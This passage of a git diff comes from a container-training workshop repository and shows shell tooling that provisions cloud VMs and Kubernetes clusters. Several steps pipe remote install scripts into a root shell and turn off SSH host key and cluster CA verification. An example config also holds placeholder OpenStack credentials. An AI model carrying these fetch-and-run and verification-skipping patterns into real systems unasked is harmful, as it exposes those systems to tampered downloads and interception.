"s3:ListBucket",
|
||||
"s3:GetObject*"
|
||||
],
|
||||
"Resource": [
|
||||
"arn:aws:s3:::$BUCKET",
|
||||
"arn:aws:s3:::$BUCKET/*"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
EOF
|
||||
)
|
||||
|
||||
aws iam create-policy \
|
||||
--policy-name $POLICY_NAME \
|
||||
--policy-doc "$POLICY_DOC"
|
||||
|
||||
aws s3 mb s3://container.training
|
||||
|
||||
echo "this is a public object" \
|
||||
| aws s3 cp - s3://container.training/public.txt \
|
||||
--acl public-read
|
||||
|
||||
echo "this is a private object" \
|
||||
| aws s3 cp - s3://container.training/private.txt \
|
||||
--acl private
|
||||
|
||||
aws iam attach-role-policy \
|
||||
--role-name "$ROLE_NAME" \
|
||||
--policy-arn arn:aws:iam::$ACCOUNT:policy/$POLICY_NAME
|
||||
prepare-eks/users.txt (new file, 50 lines)
@@ -0,0 +1,50 @@
|
||||
ada.lovelace
|
||||
adele.goldstine
|
||||
amanda.jones
|
||||
anita.borg
|
||||
ann.kiessling
|
||||
barbara.mcclintock
|
||||
beatrice.worsley
|
||||
bessie.blount
|
||||
betty.holberton
|
||||
beulah.henry
|
||||
carleen.hutchins
|
||||
caroline.herschel
|
||||
dona.bailey
|
||||
dorothy.hodgkin
|
||||
ellen.ochoa
|
||||
edith.clarke
|
||||
elisha.collier
|
||||
elizabeth.feinler
|
||||
emily.davenport
|
||||
erna.hoover
|
||||
frances.spence
|
||||
gertrude.blanch
|
||||
grace.hopper
|
||||
grete.hermann
|
||||
giuliana.tesoro
|
||||
harriet.tubman
|
||||
hedy.lamarr
|
||||
irma.wyman
|
||||
jane.goodall
|
||||
jean.bartik
|
||||
joy.mangano
|
||||
josephine.cochrane
|
||||
katherine.blodgett
|
||||
kathleen.antonelli
|
||||
lynn.conway
|
||||
margaret.hamilton
|
||||
maria.beasley
|
||||
marie.curie
|
||||
marjorie.joyner
|
||||
marlyn.meltzer
|
||||
mary.kies
|
||||
melitta.bentz
|
||||
milly.koss
|
||||
radia.perlman
|
||||
rosalind.franklin
|
||||
ruth.teitelbaum
|
||||
sarah.mather
|
||||
sophie.wilson
|
||||
stephanie.kwolek
|
||||
yvonne.brill
|
||||
@@ -7,9 +7,9 @@ workshop.


## 1. Prerequisites

Virtualbox, Vagrant and Ansible


- Virtualbox: https://www.virtualbox.org/wiki/Downloads

- Vagrant: https://www.vagrantup.com/downloads.html
@@ -25,7 +25,7 @@ Virtualbox, Vagrant and Ansible

    $ git clone --recursive https://github.com/ansible/ansible.git
    $ cd ansible
    $ git checkout stable-2.0.0.1
    $ git checkout stable-{{ getStableVersionFromAnsibleProject }}
    $ git submodule update

- source the setup script to make Ansible available on this terminal session:
@@ -38,6 +38,7 @@ Virtualbox, Vagrant and Ansible


## 2. Preparing the environment
Change into the directory that has your Vagrantfile

Run the following commands:

@@ -66,6 +67,14 @@ will reflect inside the instance.

- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed

- If you get an error like "no Vagrant file found", or you have a file but get "cannot open base box" when running `vagrant up`,
  chances are good that you are not in the correct directory.
  Make sure you are in the subdirectory named "prepare-local". It has all the config files required by Ansible, Vagrant, and Virtualbox.

- If you are using Python 3.7 and, when running the ansible-playbook provisioning, you see an error like "SyntaxError: invalid syntax" mentioning
  the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
  https://github.com/ansible/ansible/issues/42105

- If you get strange Ansible errors about dependencies, try to check your pip
  version with `pip --version`. The current version is 8.1.1. If your pip is
  older than this, upgrade it with `sudo pip install --upgrade pip`, restart
@@ -4,21 +4,32 @@ These tools can help you to create VMs on:

- Azure
- EC2
- Hetzner
- Linode
- OpenStack
- OVHcloud
- Scaleway

## Prerequisites

- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)

Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
the CLI that is specific to that cloud. For OpenStack deployments, you will
need Terraform.

And if you want to generate printable cards:

- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)

You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).

These require Python 3. If you are on a Mac, see below for specific instructions on setting up
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
may have changed your default Python to Python 2.

## General Workflow

@@ -84,29 +95,18 @@ You're all set!

## `./workshopctl` Usage

If you run `./workshopctl` without arguments, it will show a list of
available commands, looking like this:

```
workshopctl - the orchestration workshop swiss army knife
Commands:
ami          Show the AMI that will be used for deployment
amis         List Ubuntu AMIs in the current region
build        Build the Docker image to run this program in a container
cards        Generate ready-to-print cards for a group of VMs
deploy       Install Docker on a bunch of running VMs
ec2quotas    Check our EC2 quotas (max instances)
help         Show available commands
ids          List the instance IDs belonging to a given tag or token
ips          List the IP addresses of the VMs for a given tag or token
kube         Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest     Check that all nodes are reporting as Ready
list         List available groups in the current region
opensg       Open the default security group to ALL ingress traffic
pull_images  Pre-pull a bunch of Docker images
retag        Apply a new tag to a group of VMs
start        Start a group of VMs
status       List instance status for a given group
stop         Stop (terminate, shutdown, kill, remove, destroy...) instances
test         Run tests (pre-flight checks) on a group of VMs
wrap         Run this program in a container
build               Build the Docker image to run this program in a container
cards               Generate ready-to-print cards for a group of VMs
deploy              Install Docker on a bunch of running VMs
disableaddrchecks   Disable source/destination IP address checks
disabledocker       Stop Docker Engine and don't restart it automatically
...
```

### Summary of What `./workshopctl` Does For You
@@ -121,7 +121,8 @@ wrap Run this program in a container

### Example Steps to Launch a group of AWS Instances for a Workshop

- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --students 50` to create 50 clusters
- The number of instances will be `students × clustersize`
- Your local SSH key will be synced to instances under `ubuntu` user
- AWS instances will be created and tagged based on date, and IPs stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
@@ -231,12 +232,19 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m

#### List tags

    $ ./workshopctl list infra/some-infra-file

    $ ./workshopctl listall

    $ ./workshopctl tags

    $ ./workshopctl inventory infra/some-infra-file

    $ ./workshopctl inventory

Note: the `tags` command will show only the VMs that you have provisioned
and deployed on the current machine (i.e. listed in the `tags` subdirectory).
The `inventory` command will try to list all existing VMs (including the
ones not listed in the `tags` directory, and including VMs provisioned
through other mechanisms). It is not supported across all platforms,
however.

#### Stop and destroy VMs

    $ ./workshopctl stop TAG
@@ -245,3 +253,32 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m

- Don't write to bash history in system() in postprep
- compose, etc version inconsistent (int vs str)

## Making sure Python3 is the default (Mac only)

Check the `/usr/local/bin/python` symlink. It should be pointing to
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.

1) Verify that Python 3 is installed.

```
ls -la /usr/local/Cellar/Python
```

You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.

2) Verify that `python` points to Python3.

```
ls -la /usr/local/bin/python
```

If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.

```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```
prepare-vms/e2e.sh (new executable file, 10 lines)
@@ -0,0 +1,10 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
TAG=$(./workshopctl maketag)
|
||||
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG
|
||||
./workshopctl helmprom $TAG
|
||||
while ! ./workshopctl kubetest $TAG; do sleep 1; done
|
||||
./workshopctl tmux $TAG
|
||||
echo ./workshopctl stop $TAG
|
||||
prepare-vms/infra/example.openstack-cli (new file, 24 lines)
@@ -0,0 +1,24 @@
|
||||
INFRACLASS=openstack-cli
|
||||
|
||||
# Copy that file to e.g. openstack or ovh, then customize it.
|
||||
# Some Openstack providers (like OVHcloud) will let you download
|
||||
# a file containing credentials. That's what you need to use.
|
||||
# The file below contains some example values.
|
||||
export OS_AUTH_URL=https://auth.cloud.ovh.net/v3/
|
||||
export OS_IDENTITY_API_VERSION=3
|
||||
export OS_USER_DOMAIN_NAME=${OS_USER_DOMAIN_NAME:-"Default"}
|
||||
export OS_PROJECT_DOMAIN_NAME=${OS_PROJECT_DOMAIN_NAME:-"Default"}
|
||||
export OS_TENANT_ID=abcd1234
|
||||
export OS_TENANT_NAME="0123456"
|
||||
export OS_USERNAME="user-xyz123"
|
||||
export OS_PASSWORD=AbCd1234
|
||||
export OS_REGION_NAME="GRA7"
|
||||
|
||||
# And then some values to indicate server type, image, etc.
|
||||
# You can see available flavors with `openstack flavor list`
|
||||
export OS_FLAVOR=s1-4
|
||||
# You can see available images with `openstack image list`
|
||||
export OS_IMAGE=896c5f54-51dc-44f0-8c22-ce99ba7164df
|
||||
# You can create a key with `openstack keypair create --public-key ~/.ssh/id_rsa.pub containertraining`
|
||||
export OS_KEY=containertraining
|
||||
|
||||
@@ -1,4 +1,5 @@
INFRACLASS=openstack
INFRACLASS=openstack-tf

# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
@@ -6,4 +7,5 @@ export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"
export TF_VAR_flavor="GP1.S"
export TF_VAR_image="Ubuntu 18.04"
prepare-vms/infra/hetzner (new file, 5 lines)
@@ -0,0 +1,5 @@
INFRACLASS=hetzner
if ! [ -f ~/.config/hcloud/cli.toml ]; then
  warning "~/.config/hcloud/cli.toml not found."
  warning "Make sure that the Hetzner CLI (hcloud) is installed and configured."
fi
prepare-vms/infra/scaleway (new file, 3 lines)
@@ -0,0 +1,3 @@
INFRACLASS=scaleway
#SCW_INSTANCE_TYPE=DEV1-L
#SCW_ZONE=fr-par-2
@@ -66,7 +66,7 @@ need_infra() {

need_tag() {
    if [ -z "$TAG" ]; then
        die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
        die "Please specify a tag. To see available tags, run: $0 tags"
    fi
    if [ ! -d "tags/$TAG" ]; then
        die "Tag $TAG not found (directory tags/$TAG does not exist)."
@@ -1,8 +1,12 @@
|
||||
export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
# Ignore SSH key validation when connecting to these remote hosts.
|
||||
# (Otherwise, deployment scripts break when a VM IP address reuse.)
|
||||
SSHOPTS="-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o LogLevel=ERROR"
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
@@ -33,9 +37,24 @@ _cmd_cards() {
|
||||
../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
ln -sf ../tags/$TAG/ips.html www/$TAG.html
|
||||
ln -sf ../tags/$TAG/ips.pdf www/$TAG.pdf
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
info "Or you can start a web server with:"
|
||||
info "$0 www"
|
||||
}
|
||||
|
||||
_cmd clean "Remove information about stopped clusters"
|
||||
_cmd_clean() {
|
||||
for TAG in tags/*; do
|
||||
if grep -q ^stopped$ "$TAG/status"; then
|
||||
info "Removing $TAG..."
|
||||
rm -rf "$TAG"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
_cmd deploy "Install Docker on a bunch of running VMs"
|
||||
@@ -54,11 +73,35 @@ _cmd_deploy() {
|
||||
echo deploying > tags/$TAG/status
|
||||
sep "Deploying tag $TAG"
|
||||
|
||||
# Wait for cloudinit to be done
|
||||
# If this VM image is using cloud-init,
|
||||
# wait for cloud-init to be done
|
||||
pssh "
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done"
|
||||
if [ -d /var/lib/cloud ]; then
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done
|
||||
fi"
|
||||
|
||||
# Special case for scaleway since it doesn't come with sudo
|
||||
if [ "$INFRACLASS" = "scaleway" ]; then
|
||||
pssh -l root "
|
||||
grep DEBIAN_FRONTEND /etc/environment || echo DEBIAN_FRONTEND=noninteractive >> /etc/environment
|
||||
grep cloud-init /etc/sudoers && rm /etc/sudoers
|
||||
apt-get update && apt-get install sudo -y"
|
||||
fi
|
||||
|
||||
# FIXME
|
||||
# Special case for hetzner since it doesn't have an ubuntu user
|
||||
#if [ "$INFRACLASS" = "hetzner" ]; then
|
||||
# pssh -l root "
|
||||
#[ -d /home/ubuntu ] ||
|
||||
# useradd ubuntu -m -s /bin/bash
|
||||
#echo 'ubuntu ALL=(ALL:ALL) NOPASSWD:ALL' > /etc/sudoers.d/ubuntu
|
||||
#[ -d /home/ubuntu/.ssh ] ||
|
||||
# install --owner=ubuntu --mode=700 --directory /home/ubuntu/.ssh
|
||||
#[ -f /home/ubuntu/.ssh/authorized_keys ] ||
|
||||
# install --owner=ubuntu --mode=600 /root/.ssh/authorized_keys --target-directory /home/ubuntu/.ssh"
|
||||
#fi
|
||||
|
||||
# Copy settings and install Python YAML parser
|
||||
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
|
||||
@@ -66,6 +109,12 @@ _cmd_deploy() {
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install -y python-yaml"
|
||||
|
||||
# If there is no "python" binary, symlink to python3
|
||||
#pssh "
|
||||
#if ! which python; then
|
||||
# ln -s $(which python3) /usr/local/bin/python
|
||||
#fi"
|
||||
|
||||
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
|
||||
pssh -I tee /tmp/postprep.py <lib/postprep.py
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
|
||||
@@ -74,10 +123,10 @@ _cmd_deploy() {
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
ssh $SSHOPTS \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
@@ -86,11 +135,11 @@ _cmd_deploy() {
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||

-# On node1, create and deploy TLS certs using Docker Machine
+# On the first node, create and deploy TLS certs using Docker Machine
+# (Currently disabled.)
true || pssh "
-if grep -q node1 /tmp/node; then
-grep ' node' /etc/hosts |
+if i_am_first_node; then
+grep '[0-9]\$' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
@@ -103,32 +152,45 @@ _cmd_deploy() {
info "$0 cards $TAG"
}

_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag

pssh "
sudo systemctl disable docker.service
sudo systemctl disable docker.socket
sudo systemctl stop docker
sudo killall containerd
"
}

_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag

##VERSION##
ETCD_VERSION=v3.4.13
K8SBIN_VERSION=v1.19.11 # Can't go to 1.20 because it requires a serviceaccount signing key.
CNI_VERSION=v0.8.7
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
-curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
+curl -L https://github.com/etcd-io/etcd/releases/download/$ETCD_VERSION/etcd-$ETCD_VERSION-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
-if ! [ -x hyperkube ]; then
-curl -L https://dl.k8s.io/v1.14.0/kubernetes-server-linux-amd64.tar.gz \
-| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
-fi
if ! [ -x kubelet ]; then
-for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
-do
-sudo ln -s hyperkube \$BINARY
-done
+##VERSION##
+curl -L https://dl.k8s.io/$K8SBIN_VERSION/kubernetes-server-linux-amd64.tar.gz \
+| sudo tar --strip-components=3 -zx \
+kubernetes/server/bin/kube{ctl,let,-proxy,-apiserver,-scheduler,-controller-manager}
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
-curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
+curl -L https://github.com/containernetworking/plugins/releases/download/$CNI_VERSION/cni-plugins-linux-amd64-$CNI_VERSION.tgz \
| sudo tar -zx
fi
"
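A quick sanity check after kubebins, run from the driver machine (a sketch; assumes deploy already ran, so the docker account exists on the nodes):

IP=$(head -1 tags/$TAG/ips.txt)
ssh docker@$IP 'etcd --version | head -1 && kubelet --version && ls /opt/cni/bin'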
@@ -139,6 +201,16 @@ _cmd_kube() {
TAG=$1
need_tag

# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_APTGET="=$KUBEVERSION-00"
EXTRA_KUBEADM="kubernetesVersion: v$KUBEVERSION"
else
EXTRA_APTGET=""
EXTRA_KUBEADM=""
fi

# Install packages
pssh --timeout 200 "
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
@@ -147,19 +219,45 @@ _cmd_kube() {
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
-sudo apt-get install -qy kubelet kubeadm kubectl &&
-kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
+sudo apt-get install -qy kubelet$EXTRA_APTGET kubeadm$EXTRA_APTGET kubectl$EXTRA_APTGET &&
+kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl &&
+echo 'alias k=kubectl' | sudo tee /etc/bash_completion.d/k &&
+echo 'complete -F __start_kubectl k' | sudo tee -a /etc/bash_completion.d/k"

-# Initialize kube master
+# Disable swap
+# (note that this won't survive across node reboots!)
+if [ "$INFRACLASS" = "linode" ]; then
+pssh "
+sudo swapoff -a"
+fi
+
+# Initialize kube control plane
pssh --timeout 200 "
-if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
+if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
-sudo kubeadm init --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
+cat >/tmp/kubeadm-config.yaml <<EOF
+kind: InitConfiguration
+apiVersion: kubeadm.k8s.io/v1beta2
+bootstrapTokens:
+- token: \$(cat /tmp/token)
+---
+kind: KubeletConfiguration
+apiVersion: kubelet.config.k8s.io/v1beta1
+cgroupDriver: cgroupfs
+---
+kind: ClusterConfiguration
+apiVersion: kubeadm.k8s.io/v1beta2
+apiServer:
+certSANs:
+- \$(cat /tmp/ipv4)
+$EXTRA_KUBEADM
+EOF
+sudo kubeadm init --config=/tmp/kubeadm-config.yaml --ignore-preflight-errors=NumCPU
fi"
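With the optional version argument wired through EXTRA_APTGET and EXTRA_KUBEADM above, a pinned-version run looks like this (tag value illustrative):

./workshopctl kube 2021-09-20-14-32-jp 1.19.11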

# Put kubeconfig in ubuntu's and docker's accounts
pssh "
-if grep -q node1 /tmp/node; then
+if i_am_first_node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -169,34 +267,41 @@ _cmd_kube() {

# Install weave as the pod network
pssh "
-if grep -q node1 /tmp/node; then
+if i_am_first_node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"

# Join the other nodes to the cluster
pssh --timeout 200 "
-if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
-TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
-sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
+if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
+FIRSTNODE=\$(cat /etc/name_of_first_node) &&
+TOKEN=\$(ssh $SSHOPTS \$FIRSTNODE cat /tmp/token) &&
+sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
fi"

# Install metrics server
pssh "
-if grep -q node1 /tmp/node; then
+if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
fi"
}

_cmd kubetools "Install a bunch of CLI tools for Kubernetes"
_cmd_kubetools() {
TAG=$1
need_tag

# Install kubectx and kubens
pssh "
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
-sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
-sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
-sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
+sudo ln -sf \$HOME/kubectx/kubectx /usr/local/bin/kctx &&
+sudo ln -sf \$HOME/kubectx/kubens /usr/local/bin/kns &&
+sudo cp \$HOME/kubectx/completion/*.bash /etc/bash_completion.d &&
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
sudo -u docker tee -a /home/docker/.bashrc <<EOF
-. /home/ubuntu/kube-ps1/kube-ps1.sh
+. \$HOME/kube-ps1/kube-ps1.sh
KUBE_PS1_PREFIX=""
KUBE_PS1_SUFFIX=""
KUBE_PS1_SYMBOL_ENABLE="false"
@@ -208,7 +313,7 @@ EOF"
pssh "
if [ ! -x /usr/local/bin/stern ]; then
##VERSION##
-sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
+sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
sudo chmod +x /usr/local/bin/stern &&
stern --completion bash | sudo tee /etc/bash_completion.d/stern
fi"
@@ -216,11 +321,89 @@ EOF"
# Install helm
pssh "
if [ ! -x /usr/local/bin/helm ]; then
-curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash &&
+curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 | sudo bash &&
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"

-sep "Done"
# Install kustomize
pssh "
if [ ! -x /usr/local/bin/kustomize ]; then
##VERSION##
curl -L https://github.com/kubernetes-sigs/kustomize/releases/download/kustomize/v3.6.1/kustomize_v3.6.1_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx kustomize
echo complete -C /usr/local/bin/kustomize kustomize | sudo tee /etc/bash_completion.d/kustomize
fi"

# Install ship
# Note: 0.51.3 is the last version that doesn't display GIN-debug messages
# (don't want to get folks confused by that!)
pssh "
if [ ! -x /usr/local/bin/ship ]; then
##VERSION##
curl -L https://github.com/replicatedhq/ship/releases/download/v0.51.3/ship_0.51.3_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"

# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
fi"

# Install the krew package manager
pssh "
if [ ! -d /home/docker/.krew ]; then
cd /tmp &&
curl -fsSL https://github.com/kubernetes-sigs/krew/releases/latest/download/krew.tar.gz |
tar -zxf- &&
sudo -u docker -H ./krew-linux_amd64 install krew &&
echo export PATH=/home/docker/.krew/bin:\\\$PATH | sudo -u docker tee -a /home/docker/.bashrc
fi"

# Install k9s
pssh "
if [ ! -x /usr/local/bin/k9s ]; then
VERSION=v0.24.10 &&
FILENAME=k9s_\${VERSION}_\$(uname -s)_\$(uname -m).tar.gz &&
curl -sSL https://github.com/derailed/k9s/releases/download/\$VERSION/\$FILENAME |
sudo tar -zxvf- -C /usr/local/bin k9s
fi"

# Install popeye
pssh "
if [ ! -x /usr/local/bin/popeye ]; then
FILENAME=popeye_\$(uname -s)_\$(uname -m).tar.gz &&
curl -sSL https://github.com/derailed/popeye/releases/latest/download/\$FILENAME |
sudo tar -zxvf- -C /usr/local/bin popeye
fi"

# Install Tilt
pssh "
if [ ! -x /usr/local/bin/tilt ]; then
curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash
fi"

# Install Skaffold
pssh "
if [ ! -x /usr/local/bin/skaffold ]; then
curl -Lo skaffold https://storage.googleapis.com/skaffold/releases/latest/skaffold-linux-amd64 &&
sudo install skaffold /usr/local/bin/
fi"

# Install Kompose
pssh "
if [ ! -x /usr/local/bin/kompose ]; then
curl -Lo kompose https://github.com/kubernetes/kompose/releases/latest/download/kompose-linux-amd64 &&
sudo install kompose /usr/local/bin
fi"

# Install kubeseal
pssh "
if [ ! -x /usr/local/bin/kubeseal ]; then
curl -Lo kubeseal https://github.com/bitnami-labs/sealed-secrets/releases/download/v0.13.1/kubeseal-linux-amd64 &&
sudo install kubeseal /usr/local/bin
fi"
}
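A spot check that the whole toolbox landed on a node (a sketch; the tool names are the ones installed above):

ssh docker@$IP 'for t in kctx kns stern helm kustomize k9s popeye tilt skaffold kompose kubeseal; do command -v $t >/dev/null || echo "missing: $t"; done'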

_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
@@ -240,47 +423,63 @@ _cmd_kubetest() {
# Feel free to make that better ♥
pssh "
set -e
[ -f /tmp/node ]
-if grep -q node1 /tmp/node; then
if i_am_first_node; then
which kubectl
-for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
for NODE in \$(grep [0-9]\$ /etc/hosts | grep -v ^127 | awk {print\ \\\$2}); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
}

-_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
-_cmd_ids() {
_cmd ips "Show the IP addresses for a given tag"
_cmd_ips() {
TAG=$1
need_tag $TAG

-info "Looking up by tag:"
-aws_get_instance_ids_by_tag $TAG
-
-# Just in case we managed to create instances but weren't able to tag them
-info "Looking up by token:"
-aws_get_instance_ids_by_client_token $TAG
SETTINGS=tags/$TAG/settings.yaml
CLUSTERSIZE=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
while true; do
for I in $(seq $CLUSTERSIZE); do
read ip || return 0
printf "%s\t" "$ip"
done
printf "\n"
done < tags/$TAG/ips.txt
}
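For a tag whose settings declare clustersize: 3, ips reshapes the flat ips.txt into one tab-separated line per cluster, e.g. (addresses illustrative):

./workshopctl ips 2021-09-20-14-32-jp
10.0.0.1    10.0.0.2    10.0.0.3
10.0.0.4    10.0.0.5    10.0.0.6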

-_cmd list "List available groups for a given infrastructure"
-_cmd_list() {
-need_infra $1
-infra_list
_cmd inventory "List all VMs on a given infrastructure (or all infras if no arg given)"
_cmd_inventory() {
case "$1" in
"")
for INFRA in infra/*; do
$0 inventory $INFRA
done
;;
*/example.*)
;;
*)
need_infra $1
sep "Listing instances for $1"
infra_list
;;
esac
}

-_cmd listall "List VMs running on all configured infrastructures"
-_cmd_listall() {
-for infra in infra/*; do
-case $infra in
-infra/example.*)
-;;
-*)
-info "Listing infrastructure $infra:"
-need_infra $infra
-infra_list
-;;
-esac
-done
_cmd maketag "Generate a quasi-unique tag for a group of instances"
_cmd_maketag() {
if [ -z $USER ]; then
export USER=anonymous
fi
MS=$(($(date +%N | tr -d 0)/1000000))
date +%Y-%m-%d-%H-%M-$MS-$USER
}
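Sample maketag output (the extra field between minutes and user name is the millisecond value computed in $MS; values illustrative):

./workshopctl maketag
2021-09-20-14-32-123-jp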

